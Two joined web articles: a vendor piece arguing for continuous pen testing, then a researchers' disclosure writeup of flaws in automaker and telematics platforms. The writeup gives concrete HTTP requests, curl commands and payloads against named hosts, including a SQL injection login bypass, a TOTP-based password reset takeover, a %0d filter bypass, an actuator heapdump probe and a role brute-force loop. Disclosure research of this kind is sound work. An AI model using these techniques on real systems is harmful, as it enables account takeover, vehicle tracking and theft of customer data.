Is Once-Yearly Pen Testing Enough for Your Organization?

Any organization that handles sensitive data must be diligent in its security efforts, which include regular pen testing. Even a small data breach can result in significant damage to an organization’s reputation and bottom line.

There are two main reasons why regular pen testing is necessary for secure web application development:

  • Security: Web applications are constantly evolving, and new vulnerabilities are being discovered all the time. Pen testing helps identify vulnerabilities that could be exploited by hackers and allows you to fix them before they can do any damage.
  • Compliance: Depending on your industry and the type of data you handle, you may be required to comply with certain security standards (e.g., PCI DSS, NIST, HIPAA). Regular pen testing can help you verify that your web applications meet these standards and avoid penalties for non-compliance.

How Often Should You Pentest?#

Many organizations, big and small, have a once-a-year pen testing cycle. But what’s the best frequency for pen testing? Is once a year enough, or do you need to test more often?

The answer depends on several factors, including the type of development cycle you have, the criticality of your web applications, and the industry you’re in.

You may need more frequent pen testing if:

You Have an Agile or Continuous Release Cycle#

Agile development cycles are characterized by short release cycles and rapid iterations. This can make it difficult to keep track of changes made to the codebase and makes it more likely that security vulnerabilities will be introduced.

If you’re only testing once a year, there’s a good chance that vulnerabilities will go undetected for long periods of time. This could leave your organization open to attack.

To mitigate this risk, pen testing cycles should align with the organization’s development cycle. For static web applications, testing every 4-6 months should be sufficient. But for web applications that are updated frequently, you may need to test more often, such as monthly or even weekly.

Your Web Applications Are Business-Critical#

Any system that is essential to your organization’s operations should be given extra attention when it comes to security. This is because a breach of these systems could have a devastating impact on your business. If your organization relies heavily on its web applications to do business, any downtime could result in significant financial losses.

For example, imagine that your organization’s e-commerce site went down for an hour due to a DDoS attack. Not only would you lose out on potential sales, but you would also have to deal with the cost of the attack and the negative publicity.

To avoid this scenario, it’s important to ensure that your web applications are always available and secure.

Non-critical web applications can usually get away with being tested once a year, but business-critical web applications should be tested more frequently to ensure they are not at risk of a major outage or data loss.

Your Web Applications Are Customer-Facing#

If all your web applications are internal, you may be able to get away with pen testing less frequently. However, if your web applications are accessible to the public, you must be extra diligent in your security efforts.

Web applications accessible to external traffic are more likely to be targeted by attackers. This is because there is a greater pool of attack vectors and more potential entry points for an attacker to exploit.

Customer-facing web applications also tend to have more users, which means that any security vulnerabilities will be exploited more quickly. For example, a cross-site scripting (XSS) vulnerability in an external web application with millions of users could be exploited within hours of being discovered.

To protect against these threats, it’s important to pen test customer-facing web applications more frequently than internal ones. Depending on the size and complexity of the application, you may need to pen test every month or even every week.

You Are in a High-Risk Industry#

Certain industries are more likely to be targeted by hackers due to the sensitive nature of their data. Healthcare organizations, for example, are often targeted because of the protected health information (PHI) they hold.

If your organization is in a high-risk industry, you should consider conducting pen testing more frequently to ensure that your systems are secure and meet regulatory compliance. This will help protect your data and reduce the chances of a costly security incident.

You Don’t Have Internal Security Operations or a Pen Testing Team#

This might sound counterintuitive, but if you don’t have an internal security team, you may need to conduct pen testing more frequently.

Organizations that don’t have dedicated security staff are more likely to be vulnerable to attacks.

Without an internal security team, you will need to rely on external pen testers to assess your organization’s security posture.

Depending on the size and complexity of your organization, you may need to pen test every month or even every week.

You Are Focused on Mergers or Acquisitions#

During a merger or acquisition, there is often a lot of confusion and chaos. This can make it difficult to keep track of all the systems and data that need to be secured. As a result, it’s important to conduct pen testing more frequently during these times to ensure that all systems are secure.

M&A also means that you are adding new web applications to your organization’s infrastructure. These new applications may have unknown security vulnerabilities that could put your entire organization at risk.

In 2016, Marriott acquired Starwood without being aware that hackers had exploited a flaw in Starwood’s reservation system two years earlier. Over 500 million customer records were compromised. This placed Marriott in hot water with the British watchdog ICO, resulting in 18.4 million pounds in fines in the UK. According to Bloomberg, there is more trouble ahead, as the hotel giant could “face up to $1 billion in regulatory fines and litigation costs.”

To protect against these threats, it’s important to conduct pen testing before and after an acquisition. This will help you identify potential security issues so they can be fixed before the transition is complete.

The Importance of Continuous Pen Testing#

While periodic pen testing is important, it is no longer enough in today’s world. As businesses rely more on their web applications, continuous pen testing becomes increasingly important.

There are two main types of pen testing: time-boxed and continuous.

Traditional, time-boxed pen testing is done on a set schedule, such as once a year. Because it only provides a point-in-time snapshot, vulnerabilities introduced between assessments can go undetected for months.

Continuous pen testing is the process of continuously scanning your systems for vulnerabilities, allowing you to find and fix security issues as they happen instead of waiting for a periodic assessment.

Continuous pen testing is especially important for organizations that have an agile development cycle. Since new code is deployed frequently, there is a greater chance for security vulnerabilities to be introduced.

Pen-testing-as-a-service models are where continuous pen testing shines. Outpost24’s PTaaS (Penetration Testing as a Service) platform enables businesses to conduct continuous pen testing with ease. The Outpost24 platform is kept up to date with an organization’s latest security threats and vulnerabilities, so you can be confident that your web applications are secure.

  • Combines manual and automated pen testing: Outpost24’s PTaaS platform combines manual and automated pen testing to give you the best of both worlds. This means you can find and fix vulnerabilities faster while still getting the benefits of expert analysis.
  • Comprehensive coverage: Outpost24’s platform covers all OWASP Top 10 vulnerabilities and more, so you can be confident that your web applications are secure against the latest threats.
  • Cost-effective: With Outpost24, you only pay for the services you need, which makes continuous pen testing affordable even for small businesses.

The Bottom Line#

Regular pen testing is essential for secure web application development. Depending on your organization’s size, industry, and development cycle, you may need to revise your pen testing schedule.

A once-a-year pen testing cycle may be enough for some organizations, but for most, it is not. For business-critical, customer-facing, or high-traffic web applications, you should consider continuous pen testing.

Outpost24’s PTaaS platform makes it easy and cost-effective to conduct continuous pen testing. Contact us today to learn more about our platform and how we can help you secure your web applications.


Source :
https://thehackernews.com/2023/01/is-once-yearly-pen-testing-enough-for.html

Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work.

While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn’t resist poking at the scooter’s mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

https://youtube.com/watch?v=YRAy3wv5SCk

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in finding more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports them.

Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

  • Kia, Honda, Infiniti, Nissan, Acura
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
    • Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
      • For Kia’s specifically, we could remotely access the 360-view camera and view live images from the car
  • Mercedes-Benz
    • Access to hundreds of mission-critical internal applications via improperly configured SSO, including…
      • Multiple Github instances behind SSO
      • Company-wide internal chat tool, ability to join nearly any channel
      • SonarQube, Jenkins, misc. build servers
      • Internal cloud deployment services for managing AWS instances
      • Internal Vehicle related APIs
    • Remote Code Execution on multiple systems
    • Memory leaks leading to employee/customer PII disclosure, account access
  • Hyundai, Genesis
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address
    • Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
  • BMW, Rolls Royce
    • Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee, allowed us to…
      • Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
      • Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships
  • Ferrari
    • Full zero-interaction account takeover for any Ferrari customer account
    • IDOR to access all Ferrari customer records
    • Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system
    • Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers)
  • Spireon
    • SQL injection and authorization bypass allowing full remote tracking and arbitrary command execution against the roughly 15 million connected telematics devices (see writeup 4 below)
    • Full takeover of fleet management functionality for connected fleets, including police departments, ambulance services, and trucking fleets
  • Ford
    • Full memory disclosure on production vehicle Telematics API
      • Discloses customer PII and access tokens for tracking and executing commands on vehicles
      • Discloses configuration credentials used for internal services related to Telematics
      • Ability to authenticate into customer account and access all PII and perform actions against vehicles
    • Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal
  • Reviver
    • Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following:
      • Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
      • Update any vehicle status to “STOLEN” which updates the license plate and informs authorities
      • Access all user records, including what vehicles people owned, their physical address, phone number, and email address
      • Access the fleet management functionality for any company, locate and manage all vehicles in a fleet
  • Porsche
    • Ability to retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service
  • Toyota
    • IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers
  • Jaguar, Land Rover
    • User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information
  • SiriusXM
    • Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets.

For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using tools like gau (to collect known URLs) and ffuf (to fuzz for hidden content). After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host when we sent the following HTTP request:

GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available.
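
For readers unfamiliar with those tools, the discovery step looks roughly like the sketch below; the wordlist path and flags are illustrative assumptions, not the exact commands used during the engagement.

# Collect known URLs for the host from public sources (gau), then fuzz for
# additional content (ffuf). Wordlist path is a placeholder.
gau xpita.bmwgroup.com
ffuf -u https://xpita.bmwgroup.com/FUZZ -w /path/to/wordlist.txt -mc 200,301,302,403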

One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username.

HTTP Request

GET /rest/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

{"id":"redacted","firstName":"Example","lastName":"User","userName":"example.user"}

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the “/rest/api/chains/accounts/:user_id/totp” endpoint. We noticed the word “totp”, which usually stands for time-based one-time password generation.

When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior:

HTTP Request

GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: text/plain

9373958

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction was tied to the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a password reset for the user account and followed it up to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone).

At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user.
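
Put together, the chain looked roughly like the sketch below. The endpoints come from the requests shown above; the final reset submission is simplified, since the exact form fields are not reproduced here.

# 1. Find the victim's SSO account (the wildcard search leaks the username and ID)
curl "https://xpita.bmwgroup.com/rest/api/users/victim*"

# 2. Start a normal "forgot password" flow for that username and stop at the
#    step where a one-time code is requested

# 3. Generate a valid code for the victim's account ID
curl "https://xpita.bmwgroup.com/rest/api/chains/accounts/<unique_account_id>/totp"

# 4. Enter the returned 7-digit code in the reset confirmation form and set a
#    new password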

At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees.

To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships.

After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle.

With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability.

The vulnerabilities reported to BMW and Rolls Royce have since been fixed.

(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO.

We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website, which was built for vehicle repair shops to request access to specific tools from Mercedes-Benz. The website had public registration enabled, as it was intended for repair shops, and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool: “git.mercedes-benz.com”, the company’s internal GitHub instance. We attempted to use our credentials to sign in to the Mercedes-Benz GitHub and saw that we were able to log in. Success!

The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around.

After a few minutes, we saw that the GitHub instance had internal documentation and source code for various Mercedes-Benz projects, including the Mercedes Me Connect app, which is used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions and the specific steps an employee would have to follow to build an application that talks to customer vehicles.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact.

We used our employee account to log in to numerous applications which contained sensitive information and achieved remote code execution via exposed Spring Boot actuators and consoles across dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee and ask whatever questions an actual attacker would need answered to elevate their privileges across the Mercedes-Benz infrastructure.
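
For context, exposed Spring Boot actuators are usually found by probing their well-known paths; a minimal sketch is below. The hostname is a placeholder, not an actual Mercedes-Benz system.

# Well-known actuator endpoints that, when left exposed, leak environment
# variables and full heap dumps (often containing credentials and tokens).
curl -s https://internal-app.example.com/actuator/env
curl -s https://internal-app.example.com/actuator/heapdump -o heapdump.bin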

To give an overview, we could access the following services:

  • Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
  • Spring Boot actuators which led to remote code execution and information disclosure on sensitive employee- and customer-facing applications
  • Jenkins instances
  • AWS and cloud-computing control panels where we could request, manage, and access various internal systems
  • XENTRY systems used to communicate with customer vehicles
  • Internal OAuth and application-management related functionality for configuring and managing internal apps
  • Hundreds of miscellaneous internal services

(3) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out the subdomains under publicly known domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer-facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign-on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or, at the very least, tell you where the backend API that the application talks to is located.

For this application, we noticed the following constants were set:

const i = {
                        production: !0,
                        envName: "production",
                        version: "0.0.0",
                        build: "20221223T162641363Z",
                        name: "ferrari.dws-preowned.backoffice",
                        formattedName: "CMS SPINDOX",
                        feBaseUrl: "https://{{domain}}.ferraridealers.com/",
                        fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
                        apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
                        apiKey: "REDACTED",
                        s3Bucket: "ferrari-dws-preowned-pro",
                        cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
                        thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
                    }

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`.

Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called:

})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
                                    headers: e.headers.set("Authorization", "" + (s || void 0))
                                })).clone({
                                    headers: e.headers.set("x-api-key", "" + a)
                                }));

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.
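
A minimal reconstruction of that request is below; the header names and base URL come from the JavaScript constants above, and the key value is redacted, so treat the exact header contents as assumptions.

# List back-office users (the same endpoint also accepted a POST to create a
# new super admin user).
curl -s "https://api.ferrari.com/cms/dws/back-office/auth/bo-users" \
  -H "x-api-key: <REDACTED_API_KEY>" \
  -H "Authorization: <session token>"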

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`:

return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t

The following request unlocked the final piece of the puzzle, revealing a treasure trove of API credentials for Ferrari:

GET /cms/dws/back-office/rest-connector-models HTTP/1.1

To explain this endpoint’s purpose: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When we hit this API endpoint, it returned the full list of API endpoints, hosts, and authorization headers (in plain text).

This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. 

HTTP Request

GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname.

Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner.

This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(4) SQL Injection and Regex Authorization Bypass on Spireon Systems Allows an Attacker to Access, Track, and Send Arbitrary Commands to 15 Million Telematics Systems and Additionally Fully Take Over Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate that sold standalone devices which were put into vehicles to track and manage them. The devices can be tracked and can receive arbitrary commands, e.g. locking the starter so the vehicle cannot start.

Over the years, Spireon acquired many GPS vehicle tracking and management companies and brought them under the Spireon parent company.

We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers, as well as many services through their subsidiary companies like OnStar.

We decided to research them because, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles, with very serious consequences like sending a city’s police officers to a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com

The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login.

Since the website was so old, we tried the trusted manual SQL injection payloads but were kicked out by a WAF that was installed on the system.

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack.

For the username field, we came up with a very simple payload:

victim' #

The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s Intruder with a common username list and observed various 301 redirects to “/dashboard” for the usernames “administrator” and “admin”.
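
In curl, the login probe looked roughly like the sketch below. The form field names and the login path are assumptions for illustration; the real request was simply the portal’s login form submitted through Burp.

# Submit the authentication-bypass payload as the username; a 301 redirect to
# /dashboard suggests the username exists and the password check was cut off.
curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' \
  --data-urlencode "username=victim' #" \
  --data-urlencode "password=anything" \
  "https://admin.spireon.com/login"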

After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints.

The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware.

Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software.

At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. 

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations.

We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error.

Our goal now was to see if we could find some sort of authorization bypass on the host and determine which endpoints were accessible. By bypassing the administrator UI, we could reach each device directly and query vehicles and user accounts via the backend API.

We fuzzed the host and eventually observed some weird behavior:

By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters.
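
A rough sketch of that enumeration is below; the backend hostname is a placeholder (the real one was disclosed by the 500 error), and only the prefix position is shown.

# Try every single-byte percent-encoded prefix (%00-%FF) in front of the
# blacklisted strings and record which ones return something other than 403/404.
for i in $(seq 0 255); do
  prefix=$(printf '%%%02X' "$i")
  for path in admin dashboard; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "https://backend.example.com/${prefix}${path}")
    echo "${prefix}${path} -> ${code}"
  done
done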

During scanning, we saw that the following HTTP requests would return a 200 OK response:

GET /%0dadmin
GET /%0ddashboard

Through Burp Suite, we rendered the HTTP response in our browser: it was a full administrative portal for the core Spireon app. We quickly set up a match-and-replace rule to rewrite GET /admin and GET /dashboard to the endpoints with the %0d prefix.

After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app.

For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet.

(5) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all, of the digital license plates were issued through a company called Reviver.

If someone wanted a digital license plate, they’d buy the virtual Reviver license plate, which included a SIM card for remotely tracking and updating the plate. Customers who use Reviver can remotely update their license plate’s slogan and background, and additionally report the car as stolen by setting the plate tag to “STOLEN”.

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the “pr-api.rplate.com” website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account.

The company JSON object was super interesting, as we could update many of the JSON fields within the object. One of these fields was called “type” and was set to “CONSUMER” by default. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a password reset on our account, which gave us a URL to navigate to.

Once we opened the password reset URL, we observed that the website had tons of functionality, including the ability to administer vehicles, fleets, and user accounts. This was super interesting, as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to contain the names of the other roles that our user account could be assigned (e.g. specialized names for user, moderator, admin, etc.).

We queried the “CONSUMER” string in the JavaScript and saw that there were other roles defined there. After updating our “role” parameter to the disclosed “CORPORATE” role, we refreshed our profile metadata and saw that it was successful! We were able to change our role to one other than the default user account, opening the door to potential privilege escalation vulnerabilities.

It appeared that, even though we had updated our account to the “CORPORATE” role, we were still receiving authorization errors when logging into the website. We thought for a while until realizing that we could invite users to our modified account, which had the elevated role; the invited users might then be granted the required permissions, since they were invited via an intended flow rather than by mass assigning an account to an elevated role.

After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions.

This perplexed us, as there was likely some administration group in the system that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, so we could simply run through the numbers 0-100 and find all the roles on the website.
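
A sketch of that brute force is below. The company-update endpoint, JSON shape, and auth header are hypothetical stand-ins for illustration; the real requests were replayed from the mobile app’s API traffic against pr-api.rplate.com.

# Iterate candidate numeric values for the mass-assignable "type" field and
# watch which role name comes back (endpoint and fields are hypothetical).
for role in $(seq 0 100); do
  curl -s -X PUT "https://pr-api.rplate.com/api/v1/company/<company_id>" \
    -H "Authorization: Bearer <token>" \
    -H "Content-Type: application/json" \
    -d "{\"type\": ${role}}" | grep -o '"role":"[^"]*"'
done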

The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else’s data: this worked!

We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags.

The Reviver website also offered fleet management functionality which we had full access to.

(6) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597695281881296897

(7) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597792097175674880

(8) Full Vehicle Takeover on Nissan via Mass Assignment

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597984481511903234

Credits

A number of people contributed to this project and helped create this blog post; the full list of contributors is available in the original writeup linked below.

Source :
https://samcurry.net/web-hackers-vs-the-auto-industry/

